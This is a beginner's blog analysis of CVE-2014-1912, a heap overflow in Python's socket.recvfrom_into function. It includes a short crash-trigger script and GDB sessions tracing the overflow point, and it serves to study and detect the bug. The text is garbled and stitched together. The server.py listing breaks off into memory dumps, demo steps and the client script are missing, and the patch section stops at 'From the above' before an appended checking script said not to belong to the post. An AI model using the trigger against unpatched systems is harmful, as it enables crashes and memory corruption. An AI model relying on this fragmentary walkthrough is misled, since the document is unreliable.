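Title: [Original] Introduction to and Simple Analysis of the CVE-2014-1912 Vulnerability
Author: cumirror

A while ago, CVE recorded the Python buffer overflow vulnerability CVE-2014-1912. I happened to be learning Python, so I traced and analyzed it. I am a beginner and have not yet mastered writing shellcode, so this article focuses on explaining how the vulnerability works and on locating the overflow point. If anything here is lacking or wrong, please point it out. Thank you.

1. Vulnerability overview

This vulnerability arises in the recvfrom_into function of Python's socket module: while processing a call, the function's check of recvlen against buf.len is flawed. The vulnerability affects versions before Python 2.7.7/3.4.4. You can also run the following script to check; if it produces a segmentation fault, the vulnerability is present.

Code:
    import socket
    r, w = socket.socketpair()
    w.send(b'X' * 1024)
    # Zero-length destination buffer, but 1024 bytes requested
    r.recvfrom_into(bytearray(), 1024)

2. Analysis of the overflow point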
a) Debug environment
System: Ubuntu 13.04
Python: 2.7.4
Debugger: GDB (install the Python extension: sudo apt-get install gdb python2.7-dbg)
b) demo
server.py
Code:
    import socket, array
    host = socket.gethostname()
    port = 40000
    s = socket.socket()
    s.bind((host, port))
    #mybuf = bytearray(b'BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB')
    #print hex(id(mybuf))

    0xb74bba20:  0x08290160b74bba40  0x7957ad8700000006
    0xb74bba30:  0x6f64747300000000  0x0000000000007475
    0xb74bba40:  0x0000000000000000  0x0000000000000000
    (gdb) x /10xg 0x0a1c1908
    0xa1c1908:  0x726f724242424242  0x00000039b7533000
    0xa1c1918:  0x0000000200000000  0x0000000600000001
    0xa1c1928:  0x0a1c193800000010  0x0a1c195000000000
    0xa1c1938:  0x0101007f00000002  0x0000000000000000
    0xa1c1948:  0x000000390000038e  0x000000020a1c1910
    (gdb) x /10c 0x0a1c1908
    0xa1c1908:  66 'B'  66 'B'  66 'B'  66 'B'  66 'B'  114 'r'  111 'o'  114 'r'
    0xa1c1910:  0 '\000'  48 '0'
    (gdb) break if ((char*)0x0a1c1908)[0] != 'B'
    Breakpoint 1 at 0xb77a2424
    (gdb) break sock_recvfrom_into.64651
    Breakpoint 2 at 0x806e4d3: file ../Modules/socketmodule.c, line 2720.
    (gdb) c
    Continuing.
3) Run python client.py to send overly long data.
4) Examine the overflow point
Code:
    Breakpoint 2, sock_recvfrom_into.64651 (s=0xb74b2610, args=(<array.array at remote 0xb74bba00>, 1024), kwds=0x0) at ../Modules/socketmodule.c:2720
    2720  ../Modules/socketmodule.c: No such file or directory.
    (gdb) bt
    #0  sock_recvfrom_into.64651 (s=0xb74b2610, args=(<array.array at remote 0xb74bba00>, 1024), kwds=0x0) at ../Modules/socketmodule.c:2720
    #1  0x080b6bde in call_function (oparg=<optimized out>, pp_stack=0xbfb2a58c) at ../Python/ceval.c:4021
    #2  PyEval_EvalFrameEx (f=f@entry=Frame 0xa1be5c4, for file server.py, line 18, in <module> (), throwflag=throwflag@entry=0) at ../Python/ceval.c:2666
    #3  0x0811fae9 in PyEval_EvalCodeEx (co=co@entry=0xb750ecc8, globals=globals@entry={'c': <_socketobject at remote 0xb74a9294>, 'socket': <module at remote 0xb74a0bcc>, '__builtins__': <module at remote 0xb751311c>, '__file__': 'server.py', 's': <_socketobject at remote 0xb74a92cc>, '__package__': None, 'port': 40000, 'host': 'cumirror', 'mybuf': <array.array at remote 0xb74bba00>, '__name__': '__main__', 'array': <module at remote 0xb74a0a1c>, '__doc__': None, 'addr': ('', 50195)}, locals=locals@entry={'c': <_socketobject at remote 0xb74a9294>, 'socket': <module at remote 0xb74a0bcc>, '__builtins__': <module at remote 0xb751311c>, '__file__': 'server.py', 's': <_socketobject at remote 0xb74a92cc>, '__package__': None, 'port': 40000, 'host': 'cumirror', 'mybuf': <array.array at remote 0xb74bba00>, '__name__': '__main__', 'array': <module at remote 0xb74a0a1c>, '__doc__': None, 'addr': ('', 50195)}, args=args@entry=0x0, argcount=argcount@entry=0, kws=kws@entry=0x0, kwcount=kwcount@entry=0, defs=defs@entry=0x0, defcount=defcount@entry=0, closure=closure@entry=0x0) at ../Python/ceval.c:3253
    #4  0x081836c7 in PyEval_EvalCode (co=co@entry=0xb750ecc8, globals=globals@entry={'c': <_socketobject at remote 0xb74a9294>, 'socket': <module at remote 0xb74a0bcc>, '__builtins__': <module at remote 0xb751311c>, '__file__': 'server.py', 's': <_socketobject at remote 0xb74a92cc>, '__package__': None, 'port': 40000, 'host': 'cumirror', 'mybuf': <array.array at remote 0xb74bba00>, '__name__': '__main__', 'array': <module at remote 0xb74a0a1c>, '__doc__': None, 'addr': ('', 50195)}, locals=locals@entry={'c': <_socketobject at remote 0xb74a9294>, 'socket': <module at remote 0xb74a0bcc>, '__builtins__': <module at remote 0xb751311c>, '__file__': 'server.py', 's': <_socketobject at remote 0xb74a92cc>, '__package__': None, 'port': 40000, 'host': 'cumirror', 'mybuf': <array.array at remote 0xb74bba00>, '__name__': '__main__', 'array': <module at remote 0xb74a0a1c>, '__doc__': None, 'addr': ('', 50195)}) at ../Python/ceval.c:667
    #5  0x08183b7d in run_mod.42872 (mod=mod@entry=0xa1c01f0, filename=filename@entry=0xbfb2c35e "server.py", globals=globals@entry={'c': <_socketobject at remote 0xb74a9294>, 'socket': <module at remote 0xb74a0bcc>, '__builtins__': <module at remote 0xb751311c>, '__file__': 'server.py', 's': <_socketobject at remote 0xb74a92cc>, '__package__': None, 'port': 40000, 'host': 'cumirror', 'mybuf': <array.array at remote 0xb74bba00>, '__name__': '__main__', 'array': <module at remote 0xb74a0a1c>, '__doc__': None, 'addr': ('', 50195)}, locals=locals@entry={'c': <_socketobject at remote 0xb74a9294>, 'socket': <module at remote 0xb74a0bcc>, '__builtins__': <module at remote 0xb751311c>, '__file__': 'server.py', 's': <_socketobject at remote 0xb74a92cc>, '__package__': None, 'port': 40000, 'host': 'cumirror', 'mybuf': <array.array at remote 0xb74bba00>, '__name__': '__main__', 'array': <module at remote 0xb74a0a1c>, '__doc__': None, 'addr': ('', 50195)}, flags=flags@entry=0xbfb2a79c, arena=arena@entry=0xa1d1398) at ../Python/pythonrun.c:1365
    #6  0x080a6029 in PyRun_FileExFlags (fp=fp@entry=0xa1be5b8, filename=filename@entry=0xbfb2c35e "server.py", start=start@entry=257, globals=globals@entry={'c': <_socketobject at remote 0xb74a9294>, 'socket': <module at remote 0xb74a0bcc>, '__builtins__': <module at remote 0xb751311c>, '__file__': 'server.py', 's': <_socketobject at remote 0xb74a92cc>, '__package__': None, 'port': 40000, 'host': 'cumirror', 'mybuf': <array.array at remote 0xb74bba00>, '__name__': '__main__', 'array': <module at remote 0xb74a0a1c>, '__doc__': None, 'addr': ('', 50195)}, locals=locals@entry={'c': <_socketobject at remote 0xb74a9294>, 'socket': <module at remote 0xb74a0bcc>, '__builtins__': <module at remote 0xb751311c>, '__file__': 'server.py', 's': <_socketobject at remote 0xb74a92cc>, '__package__': None, 'port': 40000, 'host':
    ---Type <return> to continue, or q <return> to quit---q
    Quit
    (gdb) c
    Continuing.

    Breakpoint 1, 0xb77a2424 in __kernel_vsyscall ()
    (gdb) bt
    #0  0xb77a2424 in __kernel_vsyscall ()
    #1  0xb777cc91 in recvfrom () from /lib/i386-linux-gnu/libpthread.so.0
    #2  0x0806e2fb in sock_recvfrom_guts (s=0xb77a2424 <__kernel_vsyscall+16>, s@entry=0xb74b2610, cbuf=0xa1c1908 "AAAAAAAr", len=1024, flags=0, addr=addr@entry=0xbfb2a478) at /usr/include/i386-linux-gnu/bits/socket2.h:76
    #3  0x0806e57f in sock_recvfrom_into.64651 (s=0xb74b2610, args=(<array.array at remote 0xb74bba00>, 1024), kwds=0x0) at ../Modules/socketmodule.c:2747
    #4  0x080b6bde in call_function (oparg=<optimized out>, pp_stack=0xbfb2a58c) at ../Python/ceval.c:4021
    #5  PyEval_EvalFrameEx (f=f@entry=Frame 0xa1be5c4, for file server.py, line 18, in <module> (), throwflag=throwflag@entry=0) at ../Python/ceval.c:2666
    #6  0x0811fae9 in PyEval_EvalCodeEx (co=co@entry=0xb750ecc8, globals=globals@entry={'c': <_socketobject at remote 0xb74a9294>, 'socket': <module at remote 0xb74a0bcc>, '__builtins__': <module at remote 0xb751311c>, '__file__': 'server.py', 's': <_socketobject at remote 0xb74a92cc>, '__package__': None, 'port': 40000, 'host': 'cumirror', 'mybuf': <array.array at remote 0xb74bba00>, '__name__': '__main__', 'array': <module at remote 0xb74a0a1c>, '__doc__': None, 'addr': ('', 50195)}, locals=locals@entry={'c': <_socketobject at remote 0xb74a9294>, 'socket': <module at remote 0xb74a0bcc>, '__builtins__': <module at remote 0xb751311c>, '__file__': 'server.py', 's': <_socketobject at remote 0xb74a92cc>, '__package__': None, 'port': 40000, 'host': 'cumirror', 'mybuf': <array.array at remote 0xb74bba00>, '__name__': '__main__', 'array': <module at remote 0xb74a0a1c>, '__doc__': None, 'addr': ('', 50195)}, args=args@entry=0x0, argcount=argcount@entry=0, kws=kws@entry=0x0, kwcount=kwcount@entry=0, defs=defs@entry=0x0, defcount=defcount@entry=0, closure=closure@entry=0x0) at ../Python/ceval.c:3253
    #7  0x081836c7 in PyEval_EvalCode (co=co@entry=0xb750ecc8, globals=globals@entry={'c': <_socketobject at remote 0xb74a9294>, 'socket': <module at remote 0xb74a0bcc>, '__builtins__': <module at remote 0xb751311c>, '__file__': 'server.py', 's': <_socketobject at remote 0xb74a92cc>, '__package__': None, 'port': 40000, 'host': 'cumirror', 'mybuf': <array.array at remote 0xb74bba00>, '__name__': '__main__', 'array': <module at remote 0xb74a0a1c>, '__doc__': None, 'addr': ('', 50195)}, locals=locals@entry={'c': <_socketobject at remote 0xb74a9294>, 'socket': <module at remote 0xb74a0bcc>, '__builtins__': <module at remote 0xb751311c>, '__file__': 'server.py', 's': <_socketobject at remote 0xb74a92cc>, '__package__': None, 'port': 40000, 'host': 'cumirror', 'mybuf': <array.array at remote 0xb74bba00>, '__name__': '__main__', 'array': <module at remote 0xb74a0a1c>, '__doc__': None, 'addr': ('', 50195)}) at ../Python/ceval.c:667
    #8  0x08183b7d in run_mod.42872 (mod=mod@entry=0xa1c01f0, filename=filename@entry=0xbfb2c35e "server.py", globals=globals@entry={'c': <_socketobject at remote 0xb74a9294>, 'socket': <module at remote 0xb74a0bcc>, '__builtins__': <module at remote 0xb751311c>, '__file__': 'server.py', 's': <_socketobject at remote 0xb74a92cc>, '__package__': None, 'port': 40000, 'host': 'cumirror', 'mybuf': <array.array at remote 0xb74bba00>, '__name__': '__main__', 'array': <module at remote 0xb74a0a1c>, '__doc__': None, 'addr': ('', 50195)}, locals=locals@entry={'c': <_socketobject at remote 0xb74a9294>, 'socket': <module at remote 0xb74a0bcc>, '__builtins__': <module at remote 0xb751311c>, '__file__': 'server.py', 's': <_socketobject at remote 0xb74a92cc>, '__package__': None, 'port': 40000, 'host': 'cumirror', 'mybuf': <array.array at remote 0xb74bba00>, '__name__': '__main__', 'array': <module at remote 0xb74a0a1c>, '__doc__': None, 'addr': ('', 50195)}, flags=flags@entry=0xbfb2a79c, arena=arena@entry=0xa1d1398) at ../Python/pythonrun.c:1365
    #9  0x080a6029 in PyRun_FileExFlags (fp=fp@entry=0xa1be5b8, filename=filename@entry=0xbfb2c35e "server.py", start=start@entry=257, globals=globals@entry={'c': <_socketobject at remote 0xb74a9294>, 'socket': <module at remote 0xb74a0bcc>, '__builtins__': <module at remote 0xb751311c>, '__file__': 'server.py', 's': <_socketobject at remote 0xb74a92cc>, '__package__': None, 'port': 40000, 'host'
    ---Type <return> to continue, or q <return> to quit---q
    Quit
    (gdb) x /10c 0x0a1c1908
    0xa1c1908:  65 'A'  65 'A'  65 'A'  65 'A'  65 'A'  65 'A'  65 'A'  114 'r'
    0xa1c1910:  0 '\000'  48 '0'

3. Vulnerability cause and patch

From the above
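
Added example, not part of the original post: the check script from section 1, run in a child process so that a crash cannot take down the caller, with the outcome classified. It assumes that a fixed interpreter rejects the call with ValueError; the names PROBE, classify and check_interpreter are illustrative.

```python
import signal
import subprocess
import sys

# The page's check script, extended to report how the call ended.
PROBE = r"""
import socket
r, w = socket.socketpair()
w.send(b'X' * 1024)
try:
    r.recvfrom_into(bytearray(), 1024)  # zero-length buffer, nbytes=1024
except ValueError:
    print('REJECTED')   # assumption: fixed builds refuse nbytes > len(buffer)
else:
    print('ACCEPTED')   # 1024 bytes were written into a 0-byte buffer
"""


def classify(returncode, stdout):
    """Turn the child's exit status and stdout into a verdict string."""
    if returncode < 0:
        # On POSIX a negative status is the number of the fatal signal.
        try:
            name = signal.Signals(-returncode).name
        except ValueError:
            name = "signal %d" % -returncode
        return "vulnerable (child killed by %s)" % name
    if "REJECTED" in stdout:
        return "patched"
    if "ACCEPTED" in stdout:
        # Heap memory was overwritten even though nothing crashed.
        return "vulnerable (overflow without crash)"
    return "inconclusive"


def check_interpreter(python=sys.executable, timeout=10):
    """Run PROBE under the given interpreter binary and classify the result."""
    proc = subprocess.run([python, "-c", PROBE], capture_output=True,
                          text=True, timeout=timeout)
    return classify(proc.returncode, proc.stdout)


if __name__ == "__main__":
    print(check_interpreter())
```

Passing the path of another interpreter binary to check_interpreter tests that build instead of the one running the script; a call that returns without crashing still counts as vulnerable, because the write past the buffer has already happened.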